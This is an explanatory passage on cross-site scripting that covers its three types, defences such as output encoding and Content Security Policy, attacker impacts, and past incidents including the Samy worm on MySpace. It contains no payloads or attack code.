Cross-site scripting (XSS) is an attack where malicious JavaScript is injected into a web page that other users view, allowing the attacker to execute code in their browsers. XSS prevention encompasses the techniques used to stop this from happening. There are three main types: stored XSS (malicious script is saved in the database and served to every user who views the page), reflected XSS (malicious script is included in a URL and reflected back in the server response), and DOM-based XSS (the attack manipulates the client-side JavaScript to execute malicious code). Prevention requires output encoding, converting special characters like angle brackets into harmless HTML entities before rendering them, along with Content Security Policy headers, input sanitization, and using frameworks like React that automatically escape output by default. The goal is to ensure that user-supplied content is always treated as data, never as executable code.
XSS is the most prevalent web application vulnerability, appearing in some form on the majority of websites tested by security researchers. When an attacker successfully executes JavaScript in another user's browser, they can steal session cookies (hijacking the user's account), redirect users to phishing sites, modify the content of the page (inserting fake login forms or payment dialogs), read keystrokes, access the user's camera or microphone, or make requests to your API as if they were the victim. Unlike server-side attacks, XSS targets your users directly, the people your application is supposed to protect. A single XSS vulnerability in a comment field, profile page, or search results page can compromise every user who views the affected content.
In 2005, the Samy worm exploited a stored XSS vulnerability on MySpace to create the fastest-spreading virus in history at the time. The worm added the creator as a friend and posted a message to the victim's profile, propagating itself to over one million users within 20 hours. While Samy was relatively harmless, it proved the devastating potential of XSS. In 2018, a stored XSS vulnerability in Steam's community market allowed attackers to inject scripts that could steal user session cookies and hijack accounts holding thousands of dollars in virtual items. eBay has been hit with multiple XSS vulnerabilities over the years, including one in 2017 that allowed attackers to inject scripts into product listings, potentially stealing payment credentials from buyers. More recently, XSS vulnerabilities in enterprise applications like Jira and Confluence have been used as stepping stones in targeted attacks against corporations, demonstrating that XSS impacts both consumer and business applications alike.